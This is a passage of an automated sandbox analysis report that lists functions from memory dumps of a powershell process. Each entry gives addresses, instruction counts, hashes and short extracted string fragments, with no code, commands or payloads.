Instruction Fuzzy Hash: CF41A1B1B002059FDB15DB34C894AAA7BF7EFC9351F045569E416EB3A0DB34AD41CB90

Function 0703D680 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c88f1034d4107c347f4cec88ff03260901a696d76df34c8bb6459a8835b7cad
Instruction ID: 60783f4d46db191d8a8809e17b504050d90a01a8edc8e8fd2a4e0178852a0e5d
Opcode Fuzzy Hash: 0c88f1034d4107c347f4cec88ff03260901a696d76df34c8bb6459a8835b7cad
Instruction Fuzzy Hash: 77412430B002049FDB14EB79C4547AEBAE7EFC8611F18C469D80AAB755DF35AC429B90

Function 098916D7 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1916804070.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95a286c6e70c88c1ca0648c9f6eb9c6d38dccaa22b8567520392243ed398f3d0
Instruction ID: 50f65981d03f112137ee1b6d1db31eed4b7a0f4cae893f6b8622e8f2515f7703
Opcode Fuzzy Hash: 95a286c6e70c88c1ca0648c9f6eb9c6d38dccaa22b8567520392243ed398f3d0
Instruction Fuzzy Hash: 6B41E974E1460A9FCB15CF98C8849AEB7F2FF48320B288259E915E7364D735EC52CB94

Function 07032BB0 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c6b3967a93adce15758e5925cf6cb1ed183a654d335bb9a07a2cf0add0bde9
Instruction ID: 27009a54d2c20a4fd28138d7ac6daca25786fd462f7acf7d823a13e3f658d9be
Opcode Fuzzy Hash: 98c6b3967a93adce15758e5925cf6cb1ed183a654d335bb9a07a2cf0add0bde9
Instruction Fuzzy Hash: 4E4139B4A006099FCB15CF58C494EAAF7B5FF48314B158259D915AB364C736FC91CFA0

Function 07037A6F Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca5bc76a83c07ae85b78fce54956d86a1d771d9baf0e464243c22b98f1f9551
Instruction ID: efb2db67711c8d4f8ec62004332e99286ac15e99a89fb2a9278cc7aad0b18129
Opcode Fuzzy Hash: cca5bc76a83c07ae85b78fce54956d86a1d771d9baf0e464243c22b98f1f9551
Instruction Fuzzy Hash: 604130B0A00209DFDB24DFA9C884B9EBBF6FF88344F148529D415AB754DB75AC45CB90

Function 0703A980 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77d0995332809653f72b044c8003adb710a1b8347c55f0f717fc23491d86ffeb
Instruction ID: 90b81a1477bb0b20bf0b0be1cb4410fc60d65196b4281f6a6ecd5ae599064850
Opcode Fuzzy Hash: 77d0995332809653f72b044c8003adb710a1b8347c55f0f717fc23491d86ffeb
Instruction Fuzzy Hash: 9B31B671A093859FCB02DB68C8A05DABFB4EF4B210B1981D7D495DB353D239EC0AC7A1

Function 098907B1 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1916804070.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 348acb6d26b7b65f8cd4f7a496da90074076958f38a32e0179a6b47b313be3b2
Instruction ID: 80745b0ec07db7c15ad2056e4dd294e16eef0cbb837b3a7c9d330e5e3198d1d3
Opcode Fuzzy Hash: 348acb6d26b7b65f8cd4f7a496da90074076958f38a32e0179a6b47b313be3b2
Instruction Fuzzy Hash: D4314F70A016099FCB14CF58C990AADFBF1FF49310B288299D959E7751C332EC81CB90

Function 0703A930 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9dc6543931bb4bc568a07b8ce707fea0d64f3d88843b01f802246bf65636d99
Instruction ID: 3c7891114c20c0c43730c0a66d65d61e98e17d89b750b0de8d663e3c50d81c31
Opcode Fuzzy Hash: b9dc6543931bb4bc568a07b8ce707fea0d64f3d88843b01f802246bf65636d99
Instruction Fuzzy Hash: 5D3184B5A093499FCB02CBA8D85099DBFB4EF4A210B198197D494EB352D235EC45CBA1

Function 098907F0 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1916804070.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f25ade5458d40c54b502e68222a3ea5a9edcd17e93273933dae25e4ede8d8cd4
Instruction ID: 1d657c7507a8116f5d7d7c6065fef9da4f4c464f9abfee8e65d4d26d367c4597
Opcode Fuzzy Hash: f25ade5458d40c54b502e68222a3ea5a9edcd17e93273933dae25e4ede8d8cd4
Instruction Fuzzy Hash: BF310B74A016099FCB14CF58C9909AEFBF1FF49310B258699E959E7751C332EC91CB90

Function 07B5898A Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f17d0bbf9e12ddd9f36a9049ba9c4534be9ef7eb6b9c14c39ad5970220d480a
Instruction ID: eb823fc6ff140f36e9e7f38504d7eae1a5161a3d1a752d165d22e25ca842dc22
Opcode Fuzzy Hash: 5f17d0bbf9e12ddd9f36a9049ba9c4534be9ef7eb6b9c14c39ad5970220d480a
Instruction Fuzzy Hash: 5321D6F0B00202DFEB149F24995677ABFB2DF81300F1944E9D905DB692E736D945C7A2

Function 0703A93B Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32dff6599f6f9828f0eb21a61fd6cb05a61743cbb11b7e0ffc9a674ca13f0c12
Instruction ID: 766c1d3972205d85ada0158c00f5028b3b9385a79d8b75752d764c18adc9982a
Opcode Fuzzy Hash: 32dff6599f6f9828f0eb21a61fd6cb05a61743cbb11b7e0ffc9a674ca13f0c12
Instruction Fuzzy Hash: 7B2185B4B093499FCB01CFA8D85099DBFB4EF4A310B198596D494DB352C335EC45CBA1

Function 04E8F520 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1895422290.0000000004E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0ce36811311a7d26fc5d33da8bf97b280e1bb6f0441de4b6844b57376861dc
Instruction ID: 922a71dbf7c3d05f0ffb4fcdbedf0834d9e6d6d56a3fc3430aa48f0a52f079c4
Opcode Fuzzy Hash: 6d0ce36811311a7d26fc5d33da8bf97b280e1bb6f0441de4b6844b57376861dc
Instruction Fuzzy Hash: 3B21E275A04200DFDF05EF14D9C4B16BB61FB88318F24C5ADE90D4A256C736E856CB61

Function 0703F510 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 583d18b16a3aee7d25d216edf3428ce5e26bca449d073ff8d45fb1c35dd80359
Instruction ID: 809d0f8d83cd04bdf7d25d791b33a66ea490aaf662f09da3d56611d466eb58d8
Opcode Fuzzy Hash: 583d18b16a3aee7d25d216edf3428ce5e26bca449d073ff8d45fb1c35dd80359
Instruction Fuzzy Hash: DD21CF35B0C3908FC72BBB38946856E7FE2EFC612175505AED442CB7A3CE289C068712

Function 098907D0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1916804070.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 442f7156655ea78691c5c4b49b5c0d1f1b8d90b28ae56443ea05d029774012b2
Instruction ID: 28c5df319f94fa90a3b02b46225bbe271d61ff8ebcce2acbfe4aa08bec50bd5d
Opcode Fuzzy Hash: 442f7156655ea78691c5c4b49b5c0d1f1b8d90b28ae56443ea05d029774012b2
Instruction Fuzzy Hash: 12310874A016099FCB14CF48C990AA9F7B2FF48310B298699D959EB765C736EC81CB90

Function 04E8F51B Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1895422290.0000000004E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86abae72bb8b1cff9036b38b87f2b2ab2493ab898db39df918bf320120c6b226
Instruction ID: caedbe2591387900891a48e18ca28ded1147276ecb797f19bc4a0ee3342bcfd8
Opcode Fuzzy Hash: 86abae72bb8b1cff9036b38b87f2b2ab2493ab898db39df918bf320120c6b226
Instruction Fuzzy Hash: 83218E76504240DFCF06DF14D5C4B15BF62FB48318F24C6ADD9094A656C336D856CB91

Function 04E8D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1895422290.0000000004E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c15c65d1ba04c1d04540760128e4fd478c0380ef1c6bfacd6861517bdbd0501
Instruction ID: 584c143a682dd6b26b81ae78c0af52280aeeed6937757cb8173f78244af4ac9b
Opcode Fuzzy Hash: 6c15c65d1ba04c1d04540760128e4fd478c0380ef1c6bfacd6861517bdbd0501
Instruction Fuzzy Hash: 53015E6100E3C09FD7129B259D94B52BFB4DF43224F1981DFD9888F2E3C2695849C772

Function 04E8D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1895422290.0000000004E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 767d91e6a00fbca5904c5b3cc449560999fb89193ac469313efd3fa631436084
Instruction ID: 6ff590ec645384d3b2304196f9bdf7ae3fa3a94b536fd6152759e667fd3031e8
Opcode Fuzzy Hash: 767d91e6a00fbca5904c5b3cc449560999fb89193ac469313efd3fa631436084
Instruction Fuzzy Hash: 2901F7315083049AEB206E11ED84FA6BF99DF41339F18C05DED4C4B2C2D679A845CAB2

Function 0703F520 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf70d37c8961e77f7d74ab683d819749d2525d9f2cf39e991b0df8aae58687b4
Instruction ID: adcf103384686f80a956ad49cb14fd8be46e721b40871e85d89a7c92bbec8bb1
Opcode Fuzzy Hash: bf70d37c8961e77f7d74ab683d819749d2525d9f2cf39e991b0df8aae58687b4
Instruction Fuzzy Hash: 06F01735704624DB862ABB68E81847E77EBEBC8662315465EE907C7B46CE349C028791

Function 09890438 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1916804070.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 706db437145c2ceeea8b707c596d556e321ec5d6e260ac4eeb63fefa053bd84a
Instruction ID: 5a223a11c9ff5cd7dcc1ba26743dceec001e4ae2ec3e21cb3d929dc564c8cefd
Opcode Fuzzy Hash: 706db437145c2ceeea8b707c596d556e321ec5d6e260ac4eeb63fefa053bd84a
Instruction Fuzzy Hash: 0AF0AE35E042099FCF10E79AE845AEEBB75EF41365F4040A9D4149B651DB386C4ACBA1

Function 07032D35 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6946a3bf06eb9cab7738586335566058653ebb7675e001429363c813d671bc2f
Instruction ID: 64bdf7473e9e0e6ad217e725688054a230ef6de6ea3566a0a92e26852664a304
Opcode Fuzzy Hash: 6946a3bf06eb9cab7738586335566058653ebb7675e001429363c813d671bc2f
Instruction Fuzzy Hash: 7FF0B4797092858FCB01C758D8605DCB7B0EF4622471582EBC458DB293C3279C47CB21

Function 0989279A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1916804070.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d03bf86d7e867336ea1829440f1a4f9785734f65e7db1a580d79c7bae486c57c
Instruction ID: 04411f8d83ebc51e21be42804166a2d4e3b0d6602dff84c4526f316784f08c8c
Opcode Fuzzy Hash: d03bf86d7e867336ea1829440f1a4f9785734f65e7db1a580d79c7bae486c57c
Instruction Fuzzy Hash: DEF01D35A00509AFCF15DB88D9409EDF7B6FF88320B248119E915B3660C732AD62DB94

Function 098921B3 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1916804070.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6da9a60be4aceb7774579e3a5d04cd72f3a31dad5c6270c2e3fa40b089ff9f8
Instruction ID: 3ccf710af357de5a43d4a64907990132d6fcce19932a5e61b2373e1729a2fd04
Opcode Fuzzy Hash: a6da9a60be4aceb7774579e3a5d04cd72f3a31dad5c6270c2e3fa40b089ff9f8
Instruction Fuzzy Hash: 8AF01D35A00104AFDB15CB88D890EBEF776FF88324F148158EA15A73A0C736AC52CB50

Function 09891214 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1916804070.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd7147a228d89a9552883832d347933725e396b53b31b2ac0c374365231cc337
Instruction ID: 720199521795fa71fcdd83ef4ad1ef4bfa6b32de1e98536324a56beecd543d6f
Opcode Fuzzy Hash: bd7147a228d89a9552883832d347933725e396b53b31b2ac0c374365231cc337
Instruction Fuzzy Hash: 8BF01735A01205AFDB15CB88D890EBEF776FF88324F248158E925A73A0C736AC52CB50

Function 07037795 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3453129cee1a1161ec2b55541879ab949772d82d5073cdc513eecbd348e15d9
Instruction ID: 2524d0b7f744c8911bf3e9396b431d89129123d114decb7a493fcbd8c37f6a3f
Opcode Fuzzy Hash: c3453129cee1a1161ec2b55541879ab949772d82d5073cdc513eecbd348e15d9
Instruction Fuzzy Hash: 99F03074F0030A9FEB14DBA0C595B6F77B2AB40304F108514D5029F354CB786D4A8BC0

Function 0703FDD4 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f104f856827f5fc07331afa5c720e26f4970be2a5abde4fb5110f64d71a621ab
Instruction ID: 222175b71013c770696c3a7c88a711922dab83c4af9791fd51ae7ec7b1c77dbb
Opcode Fuzzy Hash: f104f856827f5fc07331afa5c720e26f4970be2a5abde4fb5110f64d71a621ab
Instruction Fuzzy Hash: DDE0ECB0D102099F8780DFAD98425AEFBF4AB59200F2086AAC918D7301E63156528BD1

Function 0703FDD8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1905596319.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: a98ed9bf6a8e8081e8a218ccf0264f2ca3f8889a54902375b705cc201651cf8a
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 49D067B0D042099F8780EFADC94156EFBF4EB59204F6086AE8919E7301E7329A128BD1

Non-executed Functions

Function 07B50918 Relevance: 10.3, Strings: 8, Instructions: 310COMMON

Download Yara Rule

Strings

tPq, xrefs: 07B50B65
#k, xrefs: 07B509E7
4'q, xrefs: 07B50A1B
4'q, xrefs: 07B50A27
$q, xrefs: 07B50AFA
$q, xrefs: 07B50B2C
tPq, xrefs: 07B50B71
$q, xrefs: 07B50B20

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$tPq$tPq$#k$$q$$q$$q
API String ID: 0-492062855
Opcode ID: 34a8438d33acb4fc7c4a2872c4c464bcf80872897a7a62870c4cf3d4824653b8
Instruction ID: 4436c757c6c325f3adbaf994dee561dc163141fcc47cb0c7ae9326cb5d19685c
Opcode Fuzzy Hash: 34a8438d33acb4fc7c4a2872c4c464bcf80872897a7a62870c4cf3d4824653b8
Instruction Fuzzy Hash: D6A159F27043568FE725AB79981177ABBA1EFC6311F1884BAED45CB251DA31CC01C7A1

Function 07B54DD8 Relevance: 10.2, Strings: 8, Instructions: 160COMMON

Download Yara Rule

Strings

$q, xrefs: 07B54E34
$q, xrefs: 07B54E53
$q, xrefs: 07B54E47
tPq, xrefs: 07B54E8C
$q, xrefs: 07B54DF0
tPq, xrefs: 07B54E98
$q, xrefs: 07B54E28
$q, xrefs: 07B54E0C

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: tPq$tPq$$q$$q$$q$$q$$q$$q
API String ID: 0-1738650826
Opcode ID: a5ffd547159428324ce6cc3786827a325a461652de7b69eea80317b166ecf330
Instruction ID: 77541d0dae212ec901377b015b3a4bf48ece98321d3ac808b287965c093989d9
Opcode Fuzzy Hash: a5ffd547159428324ce6cc3786827a325a461652de7b69eea80317b166ecf330
Instruction Fuzzy Hash: 5F518EF17003968FE7299B69D81076ABBB5EF86210B1980EBED05CF352CA31DC45C362

Function 07B516D0 Relevance: 9.2, Strings: 7, Instructions: 482COMMON

Download Yara Rule

Strings

$q, xrefs: 07B516E2
4'q, xrefs: 07B51941
$q, xrefs: 07B51714
tPq, xrefs: 07B51759
$q, xrefs: 07B51708
4'q, xrefs: 07B51937
tPq, xrefs: 07B5174D

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
API String ID: 0-2432477355
Opcode ID: deb8fbf46aa04895e639e895c60f2d3ee9c5583bfc114f691a4b4fc76ab19f27
Instruction ID: d321ecefedd3d235bff88048a6756c4ae83b45cbcd7f4dbcc989423a418ead3d
Opcode Fuzzy Hash: deb8fbf46aa04895e639e895c60f2d3ee9c5583bfc114f691a4b4fc76ab19f27
Instruction Fuzzy Hash: E8F139F5B0020E8FEB259B6D94017AABBA2EFC5211F1480BADD55CB341DB31DD46C7A2

Function 07B5E464 Relevance: 9.0, Strings: 7, Instructions: 202COMMON

Download Yara Rule

Strings

tPq, xrefs: 07B5E6C4
(q, xrefs: 07B5E6F8
(q, xrefs: 07B5E68A
(q, xrefs: 07B5E6EE
4'q, xrefs: 07B5E79C
tPq, xrefs: 07B5E5C9
$q, xrefs: 07B5E4F5

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$tPq$tPq$$q$(q$(q$(q
API String ID: 0-3442133670
Opcode ID: c4e72acfdb50755c9a823d9977995a74be81125427c57cd529b6a7d80fa95c46
Instruction ID: 771dc1f330c4b424225e36c625995779d6edab838246118e3a5a4da0bfdd54c0
Opcode Fuzzy Hash: c4e72acfdb50755c9a823d9977995a74be81125427c57cd529b6a7d80fa95c46
Instruction Fuzzy Hash: B571AFF0A00206DFEB258F54D545B69B7E2EF85310F1981DAEC05AF291DB31EE81CBA1

Function 07B5E478 Relevance: 8.9, Strings: 7, Instructions: 196COMMON

Download Yara Rule

Strings

tPq, xrefs: 07B5E6C4
(q, xrefs: 07B5E6F8
(q, xrefs: 07B5E68A
(q, xrefs: 07B5E6EE
4'q, xrefs: 07B5E79C
tPq, xrefs: 07B5E5C9
$q, xrefs: 07B5E4F5

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$tPq$tPq$$q$(q$(q$(q
API String ID: 0-3442133670
Opcode ID: 19f7611c89130db30d838fdff430af5d4715826840ca95a71c4da4762c1f39ad
Instruction ID: b69ce4a04ddc3953d3cd85bbbf7c2df76127cab47586ae495be85a80fe361015
Opcode Fuzzy Hash: 19f7611c89130db30d838fdff430af5d4715826840ca95a71c4da4762c1f39ad
Instruction Fuzzy Hash: E861B2F4A00206DFEB248F55D545B69B7E2EF85310F1880DAEC05AF280DB31EE81CB91

Function 07B5E114 Relevance: 8.9, Strings: 7, Instructions: 162COMMON

Download Yara Rule

Strings

TQq, xrefs: 07B5E182
$q, xrefs: 07B5E354
$q, xrefs: 07B5E1C4
tPq, xrefs: 07B5E296
TQq, xrefs: 07B5E32A
$q, xrefs: 07B5E1A3
4'q, xrefs: 07B5E386

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$TQq$TQq$tPq$$q$$q$$q
API String ID: 0-2980145124
Opcode ID: 0be2371dd440e5e798e74cb10e9dc7dee97b4764f0a0984377129346a8b87a31
Instruction ID: 4ec19af5df7033b793ccdf598584718c4d96a28481b296c2c34e10fe16c41357
Opcode Fuzzy Hash: 0be2371dd440e5e798e74cb10e9dc7dee97b4764f0a0984377129346a8b87a31
Instruction Fuzzy Hash: AE51AFF0600206DFFB268E15D5047AAB7A2EF45711F1980EAEC159F290C772DF85CBA1

Function 07B537C8 Relevance: 8.0, Strings: 6, Instructions: 492COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B53A46
4'q, xrefs: 07B53A50
4'q, xrefs: 07B53CE9
4'q, xrefs: 07B53CDD
tPq, xrefs: 07B53BA8
tPq, xrefs: 07B53B9C

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$tPq$tPq
API String ID: 0-3271992745
Opcode ID: e06ffb21b31fc3520c6aefdff7380c6b3611d314e9258c856ca4aa822472321f
Instruction ID: ee50bf50bc210dc8c84929d60322cb80fbeee6f37d78e6d348bf3e07db6ee206
Opcode Fuzzy Hash: e06ffb21b31fc3520c6aefdff7380c6b3611d314e9258c856ca4aa822472321f
Instruction Fuzzy Hash: CCF15DF17043468FFB159B69941176ABBE2EFC5258F1884BADD06CB351DA32CC41C792

Function 07B5B1A6 Relevance: 7.9, Strings: 6, Instructions: 403COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B5B57B
4'q, xrefs: 07B5B61F
4'q, xrefs: 07B5B609
4'q, xrefs: 07B5B565
x.k, xrefs: 07B5B7E5
-k, xrefs: 07B5B81C

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$x.k$-k
API String ID: 0-3499190445
Opcode ID: b878edb60e2b15730a5484bc06aab109d18f1bea9eb6b3a873292dbf2537cf97
Instruction ID: fd81f5600f1e4eaf592d1969c37377e1ea37f6f76df84a7e895136e6722c533c
Opcode Fuzzy Hash: b878edb60e2b15730a5484bc06aab109d18f1bea9eb6b3a873292dbf2537cf97
Instruction Fuzzy Hash: 24123EB4B003199FDB24DB54D950B9EBBB2BB89304F1081E9D909AB781CB72ED81CF51

Function 07B5DBEE Relevance: 7.7, Strings: 6, Instructions: 159COMMON

Download Yara Rule

Strings

d%q, xrefs: 07B5DD9F
4'q, xrefs: 07B5DE77
$q, xrefs: 07B5DCC0
tPq, xrefs: 07B5DDD9
d%q, xrefs: 07B5DE03
d%q, xrefs: 07B5DE0D

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$d%q$d%q$d%q$tPq$$q
API String ID: 0-2531934922
Opcode ID: 03c88da56f6b789fcbf28014ae1603ca59d0ed2495698f888714375c271feebb
Instruction ID: 97a457e7af214823a8d46b2859feb0734d702db04c682bf3311fe832e469425d
Opcode Fuzzy Hash: 03c88da56f6b789fcbf28014ae1603ca59d0ed2495698f888714375c271feebb
Instruction Fuzzy Hash: BF518FF0B10206DFEF289E14D580B7ABBA2EF45614F1982E9EC059B791D772DC41CBA1

Function 07B50286 Relevance: 7.6, Strings: 6, Instructions: 79COMMON

